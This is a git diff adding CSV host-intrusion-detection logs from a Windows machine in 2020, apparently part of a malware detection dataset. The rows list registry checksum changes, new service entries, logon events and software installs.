+Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : 'ef961e75cd8476aa24c4850d5f34bb92' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : '12e3ceb622a95a7de264239c90285cbf232e3d7b' +" +"Apr 6, 2020 @ 13:30:06.408",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:06.393",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2e21c\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 13:30:06.377",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:02.537",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '2e3c26ab82f3d212e01c7a36fc87e1ec' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : 'e67dc24f9e201074962e2d341bd44cd6014de972' +" +"Apr 6, 2020 @ 13:30:01.077",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '2edfb9880b6098db85771f92c9abb21d' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '8e2af586654b1569e070c4fbc76e28dd2cc1a33c' +" +"Apr 6, 2020 @ 13:29:58.330",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : 'd0b308c687ee3018a3e8ad3d204cdf92' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : '0a764c05763acb9617f6d67fd394706d90d4fe38' +" +"Apr 6, 2020 @ 13:29:55.588",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '2edfb9880b6098db85771f92c9abb21d' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '8e2af586654b1569e070c4fbc76e28dd2cc1a33c' +" +"Apr 6, 2020 @ 13:29:54.883",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 6, 2020 @ 13:29:47.142",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : '772650c532656a63c572e644821e1138' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : '8023d90d0ef1e2ee05a05b3080d7877330bed279' +" +"Apr 6, 2020 @ 13:29:46.758",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:29:46.720",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:29:40.683",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. 
+Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '4355f5af433e33161d371707419074f9' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : '3f350c977db6ef5cb56ce92a575886c27523c9ed' +" +"Apr 6, 2020 @ 13:29:38.972",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:38.956",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:38.885",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:38.871",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:38.554",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:38.539",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:38.269",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:38.253",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:37.817",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:37.794",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2e21c\Security' was added. 
+" +"Apr 6, 2020 @ 13:29:37.632",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'b6c30bd0f7982fcdb50ea0551b18b76a' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '92e731a5f80369750a273e8b7706936de9fee902' +" +"Apr 6, 2020 @ 13:29:36.421",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:36.406",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:36.235",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:36.218",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:36.150",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:36.134",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:31.819",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:31.800",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 13:29:31.780",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c\TriggerInfo\3' was added. 
+" +"Apr 6, 2020 @ 13:29:31.760",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 13:29:31.745",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 13:29:31.730",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 13:29:31.710",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:31.559",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +" +"Apr 6, 2020 @ 13:29:30.732",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:30.716",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:29:30.443",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. 
+Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : '5c2789a3112e2515c4253933675975b9' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : '0edfc11e83f71540cb349c38152f86a97313e8d0' +" +"Apr 6, 2020 @ 13:29:30.422",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '3f3c8d4eab76f9c1e4724209182cc568' +New md5sum is : 'a22f75cfaec4ad1b3c6df4a877bca015' +Old sha1sum was: '90ad9da96f876fa6b320ea2ce0b841894ed10171' +New sha1sum is : 'c661a399d9af12513997815526adef9491bd9698' +" +"Apr 6, 2020 @ 13:29:30.384",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : '19158517b97c6e17b77c71083777fdb7' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '9d28ea24dd53ffb9cbeb93060366bed3f459f844' +" +"Apr 6, 2020 @ 13:29:27.886",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2e21c' was added. +" +"Apr 6, 2020 @ 13:29:27.871",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2e21c\Security' was added. 
+" +"Apr 6, 2020 @ 13:28:05.812",5,"New Windows Service Created", +"Apr 6, 2020 @ 13:27:52.746",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 13:27:30.927",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:27:24.286",3,"Windows User Logoff", +"Apr 6, 2020 @ 13:27:24.259",3,"Windows User Logoff", +"Apr 6, 2020 @ 13:27:24.256",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 13:27:24.208",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 13:27:22.584",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 13:27:21.551",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 6, 2020 @ 13:27:20.476",5,"Logon Failure - Unknown user or bad password", +"Apr 6, 2020 @ 13:27:18.740",3,"The Windows Search Service started", +"Apr 6, 2020 @ 13:27:17.855",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:27:17.366",3,"The database engine attached a database", +"Apr 6, 2020 @ 13:27:17.272",3,"The database engine is starting a new instance", +"Apr 6, 2020 @ 13:27:12.573",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 6, 2020 @ 13:27:09.479",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 13:27:09.167",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 13:27:09.148",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 13:27:08.051",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 13:27:07.070",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:27:05.412",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 6, 2020 @ 13:26:31.583",5,"File added to the system.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce' was added. 
+" +"Apr 6, 2020 @ 13:26:31.569",5,"File added to the system.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce' was added. +" +"Apr 6, 2020 @ 13:26:31.263",9,"Windows Application error event", +"Apr 6, 2020 @ 13:26:30.466",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 13:26:30.419",5,"WSearch was unavailable to handle a notification event", +"Apr 6, 2020 @ 13:26:18.966",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '1001857a0c2e447ee83837de258faa0c' +New md5sum is : '533a94b2450e9da9730f3a8885fa28e2' +Old sha1sum was: 'fbc2dd7a0e81aa1596139b7fd30adc4b1c4c5a0a' +New sha1sum is : '9672846ee400d5d6a6606768e5f890ec38b068f7' +" +"Apr 6, 2020 @ 13:26:18.950",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'af63d4f94ca9e3f1fe87b6ae7273058d' +New md5sum is : 'd63d1a2fa60db9999c4fc04f5bc8fdd6' +Old sha1sum was: '124fc4899978bb6cfac3fdef04b2c307d5cd5fb3' +New sha1sum is : '41b7674c2a780a3d91a2498b0320f63b453edc78' +" +"Apr 6, 2020 @ 13:25:15.778",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'd74b9379d08305e497c56152fdb706f3' +New md5sum is : '3f3c8d4eab76f9c1e4724209182cc568' +Old sha1sum was: '7a48fe7361e6af26c6d7190a1de9d8947193bdbf' +New sha1sum is : '90ad9da96f876fa6b320ea2ce0b841894ed10171' +" +"Apr 6, 2020 @ 13:23:55.365",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:23:33.568",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:22:32.958",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinZip Smart Monitor Service' was added. 
+" +"Apr 6, 2020 @ 13:22:26.744",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '739c6d2d68d0a44cac9f9abccc755f23' +New md5sum is : '1001857a0c2e447ee83837de258faa0c' +Old sha1sum was: 'd8b5d9ae2b0976732fb3d7029400309de8595252' +New sha1sum is : 'fbc2dd7a0e81aa1596139b7fd30adc4b1c4c5a0a' +" +"Apr 6, 2020 @ 13:22:26.651",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : 'af63d4f94ca9e3f1fe87b6ae7273058d' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : '124fc4899978bb6cfac3fdef04b2c307d5cd5fb3' +" +"Apr 6, 2020 @ 13:22:15.928",3,"Service startup type was changed", +"Apr 6, 2020 @ 13:22:15.865",5,"New Windows Service Created", +"Apr 6, 2020 @ 13:22:12.583",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '57ab90e49fe60d2be51eb285e9aa2af6' +New md5sum is : '994f998c5dbd64f894e3a172f6292260' +Old sha1sum was: 'e505871f21b51c8ee06d585c67180c9392dc7511' +New sha1sum is : '3e50fb45bc27fbf3a9660c5d20e74191dba6788e' +" +"Apr 6, 2020 @ 13:22:12.520",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. 
+Old md5sum was: 'ce601cdb843959a2c4f6befe0c7a2242' +New md5sum is : 'd2d77583fde1e6691771b897129f28a0' +Old sha1sum was: '4f6e60f4444ced9303606d3b4d79d2fc73df8c24' +New sha1sum is : '19a05d2098ec06e6506559356f0168738c47e1a7' +" +"Apr 6, 2020 @ 13:21:38.639",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 13:21:24.621",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '6f93271d69b72b17c57d0ed14a8d7124' +New md5sum is : 'd74b9379d08305e497c56152fdb706f3' +Old sha1sum was: '43fd4f6341a282d60eb432c42415afc3f46dc022' +New sha1sum is : '7a48fe7361e6af26c6d7190a1de9d8947193bdbf' +" +"Apr 6, 2020 @ 13:20:51.413",3,"Service startup type was changed", +"Apr 6, 2020 @ 13:20:48.153",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\TabbedBrowsing' was added. +" +"Apr 6, 2020 @ 13:20:48.127",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}' was added. +" +"Apr 6, 2020 @ 13:20:48.110",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}' checksum changed. +Old md5sum was: 'eabef0d1f7faf9368acee28f84f9b211' +New md5sum is : '2a569169f4c48da58d55d87631b3625e' +Old sha1sum was: 'be8f5aa697bbfd3ee56c683cc08676dc72effdcd' +New sha1sum is : '2ff153ca41593d1937308f478acf09efa60a0930' +" +"Apr 6, 2020 @ 13:20:48.067",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main' checksum changed. 
+Old md5sum was: '1763e3f11e8f89848387ac81ad778aa5' +New md5sum is : 'e926791c45461d05188fa45b7dfbea50' +Old sha1sum was: '12d11f0fa820cffcd9480bcdf6f248b633070537' +New sha1sum is : 'f01955b750dd7024d0ec41bb6eb55cdeb3f2114a' +" +"Apr 6, 2020 @ 13:20:43.584",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}' was added. +" +"Apr 6, 2020 @ 13:20:43.561",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}\Lang0804' was added. +" +"Apr 6, 2020 @ 13:20:43.529",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}\Lang0412' was added. +" +"Apr 6, 2020 @ 13:20:43.520",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}\Lang0411' was added. +" +"Apr 6, 2020 @ 13:19:11.902",5,"Logon Failure - Unknown user or bad password", +"Apr 6, 2020 @ 13:18:54.344",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : 'efb09c0f0bf4d2938e7e5edd05292c95' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '94076bcd2b1138dd0d35c7bf7dbef9de6e0b263f' +" +"Apr 6, 2020 @ 13:18:54.329",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. 
+Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : 'efb09c0f0bf4d2938e7e5edd05292c95' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '94076bcd2b1138dd0d35c7bf7dbef9de6e0b263f' +" +"Apr 6, 2020 @ 13:18:50.595",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:18:47.376",3,"Windows Logon Success", +"Apr 6, 2020 @ 13:18:41.002",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : '739c6d2d68d0a44cac9f9abccc755f23' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : 'd8b5d9ae2b0976732fb3d7029400309de8595252' +" +"Apr 6, 2020 @ 13:18:40.969",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 6, 2020 @ 13:18:28.419",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: 'da7d4a494ab65f84a64fbfa6593fc10a' +New md5sum is : '57ab90e49fe60d2be51eb285e9aa2af6' +Old sha1sum was: 'a93a8ea22c6279318ef6c52861871046ca4d8125' +New sha1sum is : 'e505871f21b51c8ee06d585c67180c9392dc7511' +" +"Apr 6, 2020 @ 13:18:28.356",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. 
+Old md5sum was: '2748a7b4da870a32112c36673bab4670' +New md5sum is : 'ce601cdb843959a2c4f6befe0c7a2242' +Old sha1sum was: '77bb6b47213ee60fe9afadedeffb609bc118633b' +New sha1sum is : '4f6e60f4444ced9303606d3b4d79d2fc73df8c24' +" +"Apr 6, 2020 @ 13:18:27.276",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '67b63b70acc4cf09439b0064f5375078' +New md5sum is : '606d75503289ffec78fec11236a6353e' +Old sha1sum was: 'd5ad2ffed235439932f7b3d18a9d28ffe83d1079' +New sha1sum is : '33248c131c57ed1e3d99fa341dabe7bf3cbac974' +" +"Apr 6, 2020 @ 13:18:12.496",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\McAfee WebAdvisor' was added. +" +"Apr 6, 2020 @ 13:17:55.089",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application' checksum changed. +Old md5sum was: 'ca58d19f0c9bad004f0001f1f20d2ec6' +New md5sum is : '1f7c0d45cd1e28c3bc36a36dfbc11be4' +Old sha1sum was: '99d37a9ea975185bf3abd2260ba7f66cd229d7df' +New sha1sum is : '6e303174be9c95270e57c3ae64488f653ba41af7' +" +"Apr 6, 2020 @ 13:17:51.479",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\ByteFenceService' was added. +" +"Apr 6, 2020 @ 13:17:45.354",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ByteFenceService' was added. +" +"Apr 6, 2020 @ 13:17:43.025",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. 
+Old md5sum was: '775174ea9bf25c40ba381ca284d7511d' +New md5sum is : '6a4fdf3a9f7dc36fc03599f720d484d3' +Old sha1sum was: 'eab80f5279cedff3dd227a62f8828aa899a27475' +New sha1sum is : '9f469b80d1166a11ab0299760c6cb444ef555670' +" +"Apr 6, 2020 @ 13:17:41.636",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '6f93271d69b72b17c57d0ed14a8d7124' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : '43fd4f6341a282d60eb432c42415afc3f46dc022' +" +"Apr 6, 2020 @ 13:17:37.574",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\TabbedBrowsing' was added. +" +"Apr 6, 2020 @ 13:17:36.433",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}' was added. +" +"Apr 6, 2020 @ 13:17:36.418",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}' checksum changed. +Old md5sum was: 'eabef0d1f7faf9368acee28f84f9b211' +New md5sum is : '2a569169f4c48da58d55d87631b3625e' +Old sha1sum was: 'be8f5aa697bbfd3ee56c683cc08676dc72effdcd' +New sha1sum is : '2ff153ca41593d1937308f478acf09efa60a0930' +" +"Apr 6, 2020 @ 13:17:31.245",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}' was added. +" +"Apr 6, 2020 @ 13:17:31.231",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}\Lang0804' was added. 
+" +"Apr 6, 2020 @ 13:17:31.199",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}\Lang0412' was added. +" +"Apr 6, 2020 @ 13:17:31.182",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{48A61126-9A19-4C50-A214-FF08CB94995C}\Lang0411' was added. +" +"Apr 6, 2020 @ 13:17:09.808",5,"New Windows Service Created", +"Apr 6, 2020 @ 13:16:48.667",5,"New Windows Service Created", diff --git a/data/MW_21_HIDS_3.csv b/data/MW_21_HIDS_3.csv new file mode 100644 index 0000000..856d4fb --- /dev/null +++ b/data/MW_21_HIDS_3.csv 
@@ -0,0 +1,98 @@
+timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","full_log"
+"May 24, 2020 @ 13:35:49.671",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed.
+Old md5sum was: '271f59daf9ca28fbeb0bd234897e1662'
+New md5sum is : '7fa7290c3b0e7b2d8ed5a092299db356'
+Old sha1sum was: 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2'
+New sha1sum is : '27735fff26a4f9093576dfbd77d06599094d3497'
+"
+"May 24, 2020 @ 13:35:48.592",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0'
+New md5sum is : '8535e71303cbabe6816cd4f197652bc8'
+Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9'
+New sha1sum is : '46940de4369c12b1d1c24136f4fe3108925e9678'
+"
